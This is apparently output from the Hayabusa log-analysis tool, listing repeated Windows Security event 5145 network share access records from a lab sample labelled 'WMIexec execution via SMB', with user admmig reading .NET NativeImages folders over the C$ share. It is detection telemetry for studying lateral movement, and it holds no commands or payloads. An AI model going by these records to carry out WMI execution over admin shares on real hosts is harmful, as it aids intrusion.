2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
